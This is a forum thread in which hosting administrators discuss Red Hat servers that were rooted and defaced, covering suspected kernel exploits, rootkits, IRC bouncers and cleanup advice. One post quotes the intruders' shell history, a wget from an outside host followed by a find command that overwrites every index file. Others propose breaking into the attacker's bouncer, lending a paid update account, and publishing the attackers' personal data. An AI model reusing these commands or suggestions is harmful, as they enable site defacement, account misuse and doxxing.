new server got hacked

Someone was working fast then and knew you had a new box that wasn't patched (so it's likely someone you know). I have a friend who had a similar hack done on an unpatched box last spring. It's almost identical. I suggest you get ready to reimage, and be thankful it's a new install so you don't have to worry about complex backups.

 

ok, lets get down to the basics, shall we?

ptrace = LOCAL kernel exploit
kmod = LOCAL kernel exploit

so, how did he get in?
he needed a shell, right?

simple. u must be using redhat9. thats how ptrace+kmod worked. there is a similar exploit called ptrace-km3.c . its both combined together, same way, but alot faster.

if u notice, he was rm-ing files (at the start of the logs). only possibility would be cos the exploits dont work. that means 2 things - 1. this is his first attempt on ur box (or at least after the install) 2. he's an idiot who has bad memory. hackers do not usually rm their tools. they keep it for future use

now, how did he get a shell on your box? simple. redhat9 has a REMOTE amba exploit which spawns a user on the box. check your system logs, maybe u'd get a clue. if he's such an idiot who doesnt clear bash history, u can bet he wont clear system logs.

also, the fact that he heeps using .com.br free webhosts (probably free, at least) most probably shows that he is living in .br. same thing with romanians, they love to use .ro freehosts. its faster for them to upload xploits. (well, the clever hacker would use a carded domain and his own server. wont be so stupid to use a freehost - logs are all over the place)

anyways, he didn do a clean job, notice the chmodding and shit. if i were him, i'd write a ready made bash script, to provide me all the info i need. so u'd see almost nothing

hmm, below are some *GUESSES* on what each file does:

cancer = spreads whatever is in index.txt to every single index.* file. very very very lame file. in my opinion.

psybnc = as it says, a irc bouncer.

setuid = possible too to change his own userid? to change his uid to 0 so he'd be root

"squid -D" = psybnc, as i said above, disguised as a squid proxy. could also imply that he has USED squid to setup proxies on other box and is familiar with the commands.

newlocal and localroot = sounds like a rootkit to me

oh, and yes, theres something about kmod and ptrace - the exploitation is NOT instant, requires some time, but the ptrace-kmod3 is instant i think, havent used it in a long time

seriously, i think he has patched your box, maybe thats why he was runnin km at the last part? hackers dont like other hackers in their box, lol.

ok... now, how to track him down and kill him. 1. dont format the box... yet.
2. check out his psybnc stuff, as in the now, squid -D...
3. check out the psybnc.conf. no point lookin at the wget'ed copy, cos its a generic one. his password should be encrypted, but oh well... better than nothing.
4. add another ADMIN account to the psybnc conf and rehash it.
5. go in there, and wait wait wait, until he comes in. since u're admin, u should be able to see his real ip address...
6. call the feds

et voila. there, u caught ur hacker.
however, removal of rootkit is not exactly easy, lots of memory hooks and stuff.

prevention: ALWAYS use up2date if u're with redhat... set crons every 3 hours for up2date -p and 5 mins later up2date -u, should keep u very safe.

erm, if im wrong about anything, someone feel free to correct me. thanks. if anyone needs help, im available at kelvin [at] hostform.net.

regards,
kelvin
hostform internet services

 

You think i could borrow some of your knowledge and put it in my brain for awhile...

How long did it take you to learn all that?.. Any suggestions, sites, resources u can provide that will help keep out boxes secure.

I'm currently running RH9+APF+Tripwire.... but i'm still clueless to how to effectly check logs and maintain APF and tripwire....

Thanks in advance

 

These SOB's have hit a few other servers this week. So far all I've found is the t0rn root kit installed and all the index.* files replaced. You can correct all the Cpanel index problems by changing your updated prefs to the next release or down a release and /scripts/update now and /scripts/upcp. Then I rm -rf /home/*/public_html/index*

After that it's time to email the users to replace their index files.

I also reccomend recompiling the Kernel and making sure Apache, PHP etc is currrent.


This is how they replaced the index files:

188 lswget http://www.cimentsorigny.com/rula2.htm
189 wget http://www.cimentsorigny.com/rula2.htm
190 mv rula2.htm index.html
191 find / -name "index.*" -exec cp /tmp/index.html {} \;

 

I've seen that a few times this week as well.

You can delete that init file and replace it with one from the CD if you can locate it or one from a like server. I have a clean archived version that I have been using PM me if you'd like instructions on how to access and install that one.

 

*faints* redhat 7.3? sheesh, thats even MORE buggy than redhat9... not only ptrace works, samba, ssh, proftpd, everything works lol.

actually, i'd reccommend u just backup ur stuff, and reinstall. and BE at the datacenter or be online when that happens. the second after ur box is online, use redhat's up2date. 100% trusted and safe. if, however, u want a redhat paid account for updating purposes... er, email me... kelvin [at] hostform.net... i have a *cough* paid *cough* rhn acc which i dont use anymore, cos i switched to freebsd... ill lend it to u

yea, u could probably replace some files.. however, u never know if theres memory hooks or some stuff running.. thats what im afraid of...

 

By chance, were you or any of your users running the script My eGallery? You could check the apache logs, which would show it. Also, did you have /tmp set to noexec, nosuid?

 

my servr has been hacked

my server has also been hacked by IR4DEX GR0UP

all index files on the server have been defaced and in some account all pages wre defaced

also customers cannot log in to phpmyadmin.

i do not know the full extent of the damage done.

I have been told i need to do a OS reload

where can i get information on how to do this?

Thanks
Ivaserver

 

Thanks for the help

it has helped a lot

phpmyadmin is now OK

I have just received this email

IMPORTANT: Do not ignore this email.
This message is to inform you that the
account smurf has user id 0 (root privs). This could mean that
your system was compromised (OwN3D). To be safe you should verify that your
system has not be compromised.

in this account there are 5 files

.bash_history

passwd root
root@space2 [~]# passwd root
Changing password for user root.
w




.bash_logout

# ~/.bash_logout

clear




.bash_profile

# .bash_profile

# Get the aliases and functions
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi

# User specific environment and startup programs

PATH=$PATH:$HOME/bin

export PATH
unset USERNAME





.bashrc

# .bashrc

# User specific aliases and functions

# Source global definitions
if [ -f /etc/bashrc ]; then
. /etc/bashrc
fi




.emacs

;; Red Hat Linux default .emacs initialization file

;; Are we running XEmacs or Emacs?
(defvar running-xemacs (string-match "XEmacs\\|Lucid" emacs-version))

;; Set up the keyboard so the delete key on both the regular keyboard
;; and the keypad delete the character under the cursor and to the right
;; under X, instead of the default, backspace behavior.
(global-set-key [delete] 'delete-char)
(global-set-key [kp-delete] 'delete-char)

;; Turn on font-lock mode for Emacs
(cond ((not running-xemacs)
(global-font-lock-mode t)
))

;; Visual feedback on selections
(setq-default transient-mark-mode t)

;; Always end a file with a newline
(setq require-final-newline t)

;; Stop at the end of the file, not just add lines
(setq next-line-add-newlines nil)

;; Enable wheelmouse support by default
(cond (window-system
(mwheel-install)
))



Do i just need to remove the account to stop the hackers access?

Thanks Ivaserver

 

me to

mine got hacked by a group called dogm4 - same crap. I didnt have my kernel updated. Stupid me. First time in 5 years I've gotten hacked. Caught it soon though, and restored sites within the hour. Bastards. I actually was able to find the people who did this, and the IP of them, along with there phone, real e-mail, address, age, city, etc. There in Brazil. Any charges I can file? Anything at all I can do?

 

http://www.delta5.com.br/mirror/topdefacer/

Those are the fags who got all of us... Trust me. Little HACKING COMPETITION> WOOO HOO FUN STUFF. I want to meet them face to face and see what the punk script kiddies have to say.

 

Most likely nothing you can do. See: http://grc.com/dos/grcdos.htm
I also had the same thing with TechTeam changing all the index files. I have since upgraded the kernel, changed the permission on the /tmp directory, removed compilers, and blocked their IP range, but would still like to know exactly how they did it, or if any of this would have stopped them. Also, how did you find out so much information about them anyway? Maybe you should make the info public, and see how they like it... lol

 

my server provider killed the processes that were started by the hackers. This included a Half-Life server, an ircd and several unknown programs

 

deleted

 

What counts as wierd or unusal files/dirs?